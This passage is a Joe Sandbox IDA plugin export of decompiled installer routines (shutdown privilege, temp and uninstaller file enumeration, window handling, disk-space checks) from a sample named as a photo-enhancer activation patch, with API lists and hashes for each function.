Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Window$ActiveLong$IconicMessage
String ID:
API String ID: 1633107849-0
Opcode ID: 59304190847aac26e0075f57bafe87f7c31a57b7a7a7829f8250f9d0c6767a26
Instruction ID: 13cdee708698089d3899b8003c30923a51aeb8c8037ba69dea4574f539849007
Opcode Fuzzy Hash: 59304190847aac26e0075f57bafe87f7c31a57b7a7a7829f8250f9d0c6767a26
Instruction Fuzzy Hash: C6319371A00614AFDB01EFB6DC52D5EBBF8EB09304B9144BAF804E3292D7389D15CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00455E14 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00455E14() {
				int _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				signed int _t6;

				if( *0x49c0dc != 2) {
					L5:
					_t6 = ExitWindowsEx(2, 0);
					asm("sbb eax, eax");
					return  ~( ~_t6);
				}
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
					LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v16.Privileges));
					_v16.PrivilegeCount = 1;
					_v4 = 2;
					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
					if(GetLastError() == 0) {
						goto L5;
					}
					return 0;
				}
				return 0;
			}

0x00455e1e
0x00455e7b
0x00455e7f
0x00455e86
0x00000000
0x00455e88
0x00455e30
0x00455e42
0x00455e47
0x00455e4f
0x00455e69
0x00455e75
0x00000000
0x00000000
0x00000000
0x00455e77
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 00455E23
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00455E29
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455E42
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455E69
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455E6E
ExitWindowsEx.USER32 ref: 00455E7F

Strings

SeShutdownPrivilege, xrefs: 00455E3B

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: f3ce414a9ae8b0176eb463264ebd8cf1f04669fa35e8fb9271cfad6052cd7978
Instruction ID: 6597e5a33764c8e3d598d3dac94519450192e65d962eb3d098ce792c7942ec46
Opcode Fuzzy Hash: f3ce414a9ae8b0176eb463264ebd8cf1f04669fa35e8fb9271cfad6052cd7978
Instruction Fuzzy Hash: 08F06270294B02B9E620A7718C17F3B31CC9B40B59F54092ABD05EA1C3E7BCD6088A7A

Uniqueness

Uniqueness Score: -1.00%

Function 0049AF28 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0049AF28(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _v8;
				char _v12;
				struct _WIN32_FIND_DATAA _v332;
				char _v336;
				void* _t61;
				intOrPtr _t73;
				intOrPtr _t75;
				signed int _t80;
				void* _t83;
				void* _t84;
				intOrPtr _t85;

				_t83 = _t84;
				_t85 = _t84 + 0xfffffeb4;
				_v336 = 0;
				_v12 = 0;
				_t61 = __eax;
				_push(_t83);
				_push(0x49b066);
				_push( *[fs:eax]);
				 *[fs:eax] = _t85;
				E00403494( &_v336, __eax);
				E0040357C( &_v336, "isRS-???.tmp");
				_v8 = FindFirstFileA(E00403738(_v336),  &_v332);
				if(_v8 == 0xffffffff) {
					_pop(_t73);
					 *[fs:eax] = _t73;
					_push(E0049B06D);
					E00403400( &_v336);
					return E00403400( &_v12);
				} else {
					_push(_t83);
					_push(0x49b03e);
					_push( *[fs:eax]);
					 *[fs:eax] = _t85;
					do {
						if(E004078E8( &(_v332.cFileName), 5, "isRS-") == 0 && (_v332.dwFileAttributes & 0x00000010) == 0) {
							E0040355C( &_v336, 0x104,  &(_v332.cFileName));
							E004035C0( &_v12, _v336, _t61);
							_t80 = _v332.dwFileAttributes;
							if((_t80 & 0x00000001) != 0) {
								SetFileAttributesA(E00403738(_v12), _t80 & 0xfffffffe);
							}
							E004073E0(_v12);
						}
					} while (FindNextFileA(_v8,  &_v332) != 0);
					_pop(_t75);
					 *[fs:eax] = _t75;
					_push(E0049B045);
					return FindClose(_v8);
				}
			}

0x0049af29
0x0049af2b
0x0049af36
0x0049af3c
0x0049af3f
0x0049af43
0x0049af44
0x0049af49
0x0049af4c
0x0049af5e
0x0049af6e
0x0049af84
0x0049af8b
0x0049b047
0x0049b04a
0x0049b04d
0x0049b058
0x0049b065
0x0049af91
0x0049af93
0x0049af94
0x0049af99
0x0049af9c
0x0049af9f
0x0049afb6
0x0049afd2
0x0049afe2
0x0049afe7
0x0049aff3
0x0049b002
0x0049b002
0x0049b00a
0x0049b00a
0x0049b01f
0x0049b029
0x0049b02c
0x0049b02f
0x0049b03d
0x0049b03d

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,0049B066,?,?,00000000,0049E62C,?,0049B1F0,00000000,0049B244,?,?,00000000,0049E62C), ref: 0049AF7F
SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049B002
FindNextFileA.KERNEL32(000000FF,?,00000000,0049B03E,?,00000000,?,00000000,0049B066,?,?,00000000,0049E62C,?,0049B1F0,00000000), ref: 0049B01A
FindClose.KERNEL32(000000FF,0049B045,0049B03E,?,00000000,?,00000000,0049B066,?,?,00000000,0049E62C,?,0049B1F0,00000000,0049B244), ref: 0049B038

Strings

isRS-???.tmp, xrefs: 0049AF69
isRS-, xrefs: 0049AF9F

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstNext
String ID: isRS-$isRS-???.tmp
API String ID: 134685335-3422211394
Opcode ID: 8a0e407055bcc48a166b4c68cb87e7478124ee091fc37de7cfc9e5e296a24429
Instruction ID: 04bf727f3197cccd33fd944652b66e3324626472502a6d6b0206edec7ebcaf7d
Opcode Fuzzy Hash: 8a0e407055bcc48a166b4c68cb87e7478124ee091fc37de7cfc9e5e296a24429
Instruction Fuzzy Hash: 49316471901618ABDF10EF65DD41ADFBBBCDB49304F5044B7A818A32A1E7389F45CE98

Uniqueness

Uniqueness Score: -1.00%

Function 00457E24 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 241
windownativeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00457E24(void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				char _v16;
				char _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v164;
				char _v168;
				void* _t57;
				intOrPtr* _t59;
				signed int _t75;
				intOrPtr _t80;
				void* _t107;
				void* _t110;
				intOrPtr _t111;
				intOrPtr _t122;
				intOrPtr _t125;
				signed int _t156;
				intOrPtr _t162;
				signed int _t163;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr _t170;
				intOrPtr _t171;
				intOrPtr _t172;
				signed int _t175;
				intOrPtr _t179;
				intOrPtr _t184;
				void* _t189;
				void* _t190;
				intOrPtr _t191;

				_t187 = __esi;
				_t186 = __edi;
				_t189 = _t190;
				_t191 = _t190 + 0xffffff5c;
				_push(__esi);
				_push(__edi);
				_v168 = 0;
				_v12 = 0;
				_v16 = 0;
				_v8 = __edx;
				_push(_t189);
				_push(0x4581ed);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				_push(_t189);
				_push(0x4581b1);
				_push( *[fs:edx]);
				 *[fs:edx] = _t191;
				_t125 =  *_v8;
				_t57 = _t125 - 0x4a;
				if(_t57 == 0) {
					_t59 =  *((intOrPtr*)(_v8 + 8));
					_t156 =  *_t59 - 0x800;
					__eflags = _t156;
					if(_t156 == 0) {
						_push(_t189);
						_push(0x457fd2);
						_push( *[fs:edx]);
						 *[fs:edx] = _t191;
						__eflags =  *(_t59 + 4);
						E004034E0( &_v12,  *(_t59 + 4) >> 0,  *((intOrPtr*)(_t59 + 8)),  *(_t59 + 4));
						_push(_t189);
						_push(0x457f90);
						_push( *[fs:eax]);
						 *[fs:eax] = _t191;
						 *0x49f484 =  *0x49f484 + 1;
						_push(_t189);
						_push(0x457f75);
						_push( *[fs:eax]);
						 *[fs:eax] = _t191;
						E0047E4A8(_v12,  *(_t59 + 4) >> 0,  &_v16);
						_pop(_t162);
						 *[fs:eax] = _t162;
						_push(E00457F7C);
						 *0x49f484 =  *0x49f484 - 1;
						__eflags =  *0x49f484;
						return 0;
					} else {
						_t163 = _t156 - 1;
						__eflags = _t163;
						if(_t163 == 0) {
							_push(_t189);
							_push(0x4580c6);
							_push( *[fs:edx]);
							 *[fs:edx] = _t191;
							E00402738( *((intOrPtr*)(_t59 + 8)), 0x94,  &_v164);
							_push(_t189);
							_push(0x458084);
							_push( *[fs:eax]);
							 *[fs:eax] = _t191;
							__eflags =  *0x49f490;
							if( *0x49f490 == 0) {
								E0040909C("Cannot evaluate variable because [Code] isn\'t running yet", 1);
								E0040311C();
							}
							E0040355C( &_v168, 0x80,  &_v144);
							_t75 =  *0x49f490; // 0x23113e0
							E00497E94(_t75, _t125, _v152, _v156, _t186, _t187,  &_v16, _v168, _v148);
							 *((intOrPtr*)(_v8 + 0xc)) = 1;
							_pop(_t168);
							 *[fs:eax] = _t168;
							_t169 =  *0x49f020; // 0x0
							_t80 =  *0x49f01c; // 0x0
							E004317C8(_t80, _t125, 0x700, _t169, _t186, _t187, _v16);
							_pop(_t170);
							 *[fs:eax] = _t170;
						} else {
							_t175 = _t163 - 1;
							__eflags = _t175;
							if(_t175 == 0) {
								_push(_t189);
								_push(0x458122);
								_push( *[fs:edx]);
								 *[fs:edx] = _t191;
								E00403400(0x49f014);
								__eflags =  *( *((intOrPtr*)(_v8 + 8)) + 4);
								E004034E0(0x49f014,  *( *((intOrPtr*)(_v8 + 8)) + 4) >> 0,  *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + 8)),  *( *((intOrPtr*)(_v8 + 8)) + 4));
								 *((intOrPtr*)(_v8 + 0xc)) = 1;
								_pop(_t179);
								 *[fs:eax] = _t179;
							} else {
								__eflags = _t175 == 1;
								if(_t175 == 1) {
									_push(_t189);
									_push(0x458178);
									_push( *[fs:edx]);
									 *[fs:edx] = _t191;
									E00403400(0x49f018);
									__eflags =  *( *((intOrPtr*)(_v8 + 8)) + 4);
									E004034E0(0x49f018,  *( *((intOrPtr*)(_v8 + 8)) + 4) >> 0,  *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + 8)),  *( *((intOrPtr*)(_v8 + 8)) + 4));
									 *((intOrPtr*)(_v8 + 0xc)) = 1;
									_pop(_t184);
									 *[fs:eax] = _t184;
								}
							}
						}
						goto L21;
					}
				} else {
					_t107 = _t57 - 0xbb6;
					if(_t107 == 0) {
						 *0x49f010 = 0;
						 *0x49f01c = 0;
						 *0x49f024 = 1;
						 *0x49f025 = 0;
						PostMessageA(0, 0, 0, 0);
					} else {
						_t110 = _t107 - 1;
						if(_t110 == 0) {
							 *0x49f024 = 1;
							_t111 = _v8;
							__eflags =  *((intOrPtr*)(_t111 + 4)) - 1;
							 *0x49f025 =  *((intOrPtr*)(_t111 + 4)) == 1;
							PostMessageA(0, 0, 0, 0);
						} else {
							if(_t110 == 2) {
								SetForegroundWindow( *(_v8 + 4));
							} else {
								_push( *((intOrPtr*)(_v8 + 8)));
								_push( *(_v8 + 4));
								_push(_t125);
								_t122 =  *0x49f020; // 0x0
								_push(_t122);
								L00405E1C();
								 *((intOrPtr*)(_v8 + 0xc)) = _t122;
							}
						}
					}
					L21:
					_pop(_t171);
					 *[fs:eax] = _t171;
					_pop(_t172);
					 *[fs:eax] = _t172;
					_push(E004581F4);
					E00403400( &_v168);
					return E00403420( &_v16, 2);
				}
			}

0x00457e24
0x00457e24
0x00457e25
0x00457e27
0x00457e2e
0x00457e2f
0x00457e32
0x00457e38
0x00457e3b
0x00457e3e
0x00457e43
0x00457e44
0x00457e49
0x00457e4c
0x00457e51
0x00457e52
0x00457e57
0x00457e5a
0x00457e60
0x00457e64
0x00457e67
0x00457ee6
0x00457eeb
0x00457eeb
0x00457ef1
0x00457f0f
0x00457f10
0x00457f15
0x00457f18
0x00457f21
0x00457f2f
0x00457f36
0x00457f37
0x00457f3c
0x00457f3f
0x00457f42
0x00457f4a
0x00457f4b
0x00457f50
0x00457f53
0x00457f5c
0x00457f63
0x00457f66
0x00457f69
0x00457f6e
0x00457f6e
0x00457f74
0x00457ef3
0x00457ef3
0x00457ef3
0x00457ef4
0x00457fe3
0x00457fe4
0x00457fe9
0x00457fec
0x00458000
0x00458007
0x00458008
0x0045800d
0x00458010
0x00458013
0x0045801a
0x00458028
0x0045802d
0x0045802d
0x0045804a
0x00458066
0x0045806b
0x00458073
0x0045807c
0x0045807f
0x004580a9
0x004580af
0x004580b4
0x004580bb
0x004580be
0x00457efa
0x00457efa
0x00457efa
0x00457efb
0x004580d7
0x004580d8
0x004580dd
0x004580e0
0x004580e8
0x004580f6
0x00458106
0x0045810e
0x00458117
0x0045811a
0x00457f01
0x00457f01
0x00457f02
0x00458130
0x00458131
0x00458136
0x00458139
0x00458141
0x0045814f
0x0045815f
0x00458167
0x00458170
0x00458173
0x00458173
0x00457f02
0x00457efb
0x00000000
0x00457ef4
0x00457e69
0x00457e69
0x00457e6e
0x00457e7d
0x00457e86
0x00457e8b
0x00457e92
0x00457ea1
0x00457e70
0x00457e70
0x00457e71
0x00457eab
0x00457eb2
0x00457eb5
0x00457eb9
0x00457ec8
0x00457e73
0x00457e76
0x00457ed9
0x00457e78
0x0045818a
0x00458191
0x00458195
0x00458196
0x0045819b
0x0045819c
0x004581a4
0x004581a4
0x00457e76
0x00457e71
0x004581a7
0x004581a9
0x004581ac
0x004581c9
0x004581cc
0x004581cf
0x004581da
0x004581ec
0x004581ec

APIs

PostMessageA.USER32 ref: 00457EA1
PostMessageA.USER32 ref: 00457EC8
SetForegroundWindow.USER32(?,00000000,004581B1,?,00000000,004581ED), ref: 00457ED9
NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,004581B1,?,00000000,004581ED), ref: 0045819C

Strings

Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045801C

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: MessagePostWindow$ForegroundNtdllProc_
String ID: Cannot evaluate variable because [Code] isn't running yet
API String ID: 2236967946-3182603685
Opcode ID: f0d9271b3600f25c345f7473f4edd4a9770fb5d51f0c8beac7dd56fb421c1a46
Instruction ID: 1e470f9c67850fe58258b166e2de1343f71499e9040d68aaec82a8138f7570a6
Opcode Fuzzy Hash: f0d9271b3600f25c345f7473f4edd4a9770fb5d51f0c8beac7dd56fb421c1a46
Instruction Fuzzy Hash: D491FE34704604EFDB15CF55DD51F5ABBF9EB88704F2184BAE804A7792CA38AE09CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0045663C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E0045663C(char __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v5;
				char _v6;
				char _v16;
				long _v20;
				long _v24;
				long _v28;
				long _v32;
				char _v36;
				char _v40;
				signed int _t63;
				signed int _t82;
				intOrPtr* _t90;
				intOrPtr _t103;
				intOrPtr _t110;
				void* _t113;
				void* _t115;
				void* _t117;
				void* _t118;
				intOrPtr _t119;

				_t117 = _t118;
				_t119 = _t118 + 0xffffffdc;
				_v36 = 0;
				_v40 = 0;
				_t113 = __ecx;
				_t115 = __edx;
				_v5 = __eax;
				_push(_t117);
				_push(0x45677b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				_t90 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetDiskFreeSpaceExA");
				if(E00452EFC(_v5,  &_v16) != 0) {
					_push(_t117);
					_push(0x456759);
					_push( *[fs:eax]);
					 *[fs:eax] = _t119;
					if(_t90 == 0) {
						E0042CC94(_t115,  &_v36);
						E0042CD5C(_v36,  &_v40);
						E0042C88C(_v40,  &_v36);
						_t63 = GetDiskFreeSpaceA(E00403738(_v36),  &_v20,  &_v24,  &_v28,  &_v32);
						asm("sbb eax, eax");
						_v6 =  ~( ~_t63);
						if(_v6 != 0) {
							E004310BC(_v24 * _v20, _t113, _v28);
							E004310BC(_v24 * _v20, _a4, _v32);
						}
					} else {
						E0042CC94(_t115,  &_v40);
						E0042C88C(_v40,  &_v36);
						_t82 =  *_t90(E00403738(_v36), _t113, _a4, 0);
						asm("sbb eax, eax");
						_v6 =  ~( ~_t82);
					}
					_pop(_t103);
					 *[fs:eax] = _t103;
					_push(0x456760);
					return E00452F38( &_v16);
				} else {
					_v6 = 0;
					_pop(_t110);
					 *[fs:eax] = _t110;
					_push(0x456782);
					return E00403420( &_v40, 2);
				}
			}

0x0045663d
0x0045663f
0x00456647
0x0045664a
0x0045664d
0x0045664f
0x00456651
0x00456656
0x00456657
0x0045665c
0x0045665f
0x00456677
0x00456686
0x00456693
0x00456694
0x00456699
0x0045669c
0x004566a1
0x004566ea
0x004566f5
0x00456700
0x0045670e
0x00456715
0x00456719
0x00456720
0x0045672d
0x0045673e
0x0045673e
0x004566a3
0x004566af
0x004566ba
0x004566c8
0x004566cc
0x004566d0
0x004566d0
0x00456745
0x00456748
0x0045674b
0x00456758
0x00456688
0x00456688
0x00456762
0x00456765
0x00456768
0x0045677a
0x0045677a

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,0045677B), ref: 0045666C
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00456672

Strings

GetDiskFreeSpaceExA, xrefs: 00456662
kernel32.dll, xrefs: 00456667

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: a26a4e61d10e36191c5b55e3e1f91ca85e589b1de8ffa63c09561c8afc3ad412
Instruction ID: b3c638b06f07771193fa82c07f29861e578aec67d60b7d75356f70af58752f0b
Opcode Fuzzy Hash: a26a4e61d10e36191c5b55e3e1f91ca85e589b1de8ffa63c09561c8afc3ad412
Instruction Fuzzy Hash: 84418271A00249AFCF01EFA5C8829EEB7B8EF4C305F51456AF804F7252D6785E098B68

Uniqueness

Uniqueness Score: -1.00%

Function 00476F44 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00476F44(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _WIN32_FIND_DATAA _v328;
				char _v332;
				void* _t59;
				void* _t62;
				void* _t65;
				void* _t76;
				intOrPtr _t85;
				void* _t98;

				_v332 = 0;
				_v8 = 0;
				_push(_t98);
				_push(0x4770ae);
				_push( *[fs:eax]);
				 *[fs:eax] = _t98 + 0xfffffeb8;
				E0042C88C( *((intOrPtr*)(_a4 - 4)),  &_v332);
				E0040357C( &_v332, "unins???.*");
				_t76 = FindFirstFileA(E00403738(_v332),  &_v328);
				if(_t76 == 0xffffffff) {
					L10:
					_pop(_t85);
					 *[fs:eax] = _t85;
					_push(0x4770b5);
					E00403400( &_v332);
					return E00403400( &_v8);
				} else {
					goto L1;
				}
				L8:
				if(FindNextFileA(_t76,  &_v328) != 0) {
					L1:
					E0040355C( &_v8, 0x104,  &(_v328.cFileName));
					if(E00403574(_v8) >= 9) {
						E00403778(_v8, 5, 1,  &_v332);
						_t59 = E00406F54(_v332, 0x4770d8);
						_t102 = _t59;
						if(_t59 == 0) {
							_t62 = E0042EF2C( *((intOrPtr*)(_v8 + 5)), _t102);
							_t103 = _t62;
							if(_t62 != 0) {
								_t65 = E0042EF2C( *((intOrPtr*)(_v8 + 6)), _t103);
								_t104 = _t65;
								if(_t65 != 0 && E0042EF2C( *((intOrPtr*)(_v8 + 7)), _t104) != 0 &&  *((char*)(_v8 + 8)) == 0x2e) {
									E00403778(_v8, 3, 6,  &_v332);
									 *((char*)(_a4 + E00407228(_v332, 3) - 0x3ec)) = 1;
								}
							}
						}
					}
					goto L8;
				} else {
					FindClose(_t76);
					goto L10;
				}
			}

0x00476f52
0x00476f58
0x00476f5d
0x00476f5e
0x00476f63
0x00476f66
0x00476f7c
0x00476f8c
0x00476fa2
0x00476fa7
0x0047708d
0x0047708f
0x00477092
0x00477095
0x004770a0
0x004770ad
0x00000000
0x00000000
0x00000000
0x00477072
0x00477081
0x00476fad
0x00476fbb
0x00476fcb
0x00476fe5
0x00476ff5
0x00476ffa
0x00476ffc
0x00477009
0x0047700e
0x00477010
0x0047701d
0x00477022
0x00477024
0x00477057
0x0047706a
0x0047706a
0x00477024
0x00477010
0x00476ffc
0x00000000
0x00477087
0x00477088
0x00000000
0x00477088

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,004770AE,?,?,0049F1E4,00000000), ref: 00476F9D
FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004770AE,?,?,0049F1E4,00000000), ref: 0047707A
FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004770AE,?,?,0049F1E4,00000000), ref: 00477088

Strings

unins???.*, xrefs: 00476F87
unins, xrefs: 00476FF0

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID: unins$unins???.*
API String ID: 3541575487-1009660736
Opcode ID: e251b762db6165ba207b7824ace5213380cead4c6968a53f505fa530eae50332
Instruction ID: b3651197dbd027c67a28626735fb33018e03d09d0edc3c1e02fba50c739ea7b0
Opcode Fuzzy Hash: e251b762db6165ba207b7824ace5213380cead4c6968a53f505fa530eae50332
Instruction Fuzzy Hash: C6313E70A04148AFCB10EB65CD81ADEB7BDEB45344F91C0F6A40CA72A2DB79DF458B58

Uniqueness

Uniqueness Score: -1.00%

Function 00418160 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418160(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void _v64;
				int _t51;
				void* _t52;
				int _t58;
				int _t62;

				_t58 = __ecx;
				_t62 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x24)) || __ecx !=  *((intOrPtr*)(__eax + 0x28)) || _a8 !=  *((intOrPtr*)(__eax + 0x2c))) {
					L4:
					if(E00418808(_t52) == 0 || IsIconic( *(_t52 + 0xc0)) != 0) {
						 *(_t52 + 0x24) = _t62;
						 *(_t52 + 0x28) = _t58;
						 *((intOrPtr*)(_t52 + 0x2c)) = _a8;
						 *((intOrPtr*)(_t52 + 0x30)) = _a4;
						if(E00418808(_t52) != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0xc0),  &_v48);
							E00414AEC(_t52,  &_v64);
							memcpy( &(_v48.rcNormalPosition),  &_v64, 4 << 2);
							SetWindowPlacement( *(_t52 + 0xc0),  &_v48);
						}
					} else {
						SetWindowPos( *(_t52 + 0xc0), 0, _t62, _t58, _a8, _a4, 0x14);
					}
					return E004148F0(_t52);
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x30))) {
						return _t51;
					}
					goto L4;
				}
			}

0x00418169
0x0041816b
0x0041816d
0x00418172
0x0041818d
0x00418196
0x004181c4
0x004181c7
0x004181cd
0x004181d3
0x004181df
0x004181e1
0x004181f3
0x004181fd
0x0041820d
0x0041821a
0x0041821a
0x004181a8
0x004181bd
0x004181bd
0x00000000
0x00418181
0x00418181
0x00418187
0x0041822c
0x0041822c
0x00000000
0x00418187

APIs

IsIconic.USER32 ref: 0041819F
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 004181BD
GetWindowPlacement.USER32(?,0000002C), ref: 004181F3
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 0041821A

Strings

,, xrefs: 004181E1

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: 94c27d96dae92190053cdadbd09ad202be2508a7be7ad0d7a8ed44e722cc964a
Instruction ID: 3dd2bdadd829011ee7f0b750d59610fe616def585f77d2d2d1cec2b35816d924
Opcode Fuzzy Hash: 94c27d96dae92190053cdadbd09ad202be2508a7be7ad0d7a8ed44e722cc964a
Instruction Fuzzy Hash: 02215172600204ABCF00EFA9CCC1EDA77A8AF49314F55456AFD18EF246CB78D844CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004650D0 Relevance: 7.6, APIs: 5, Instructions: 129
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E004650D0(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v5;
				int _v12;
				void* _v16;
				char _v20;
				struct _WIN32_FIND_DATAA _v340;
				char _v344;
				char _v348;
				void* _t87;
				intOrPtr _t101;
				intOrPtr _t107;
				intOrPtr _t110;
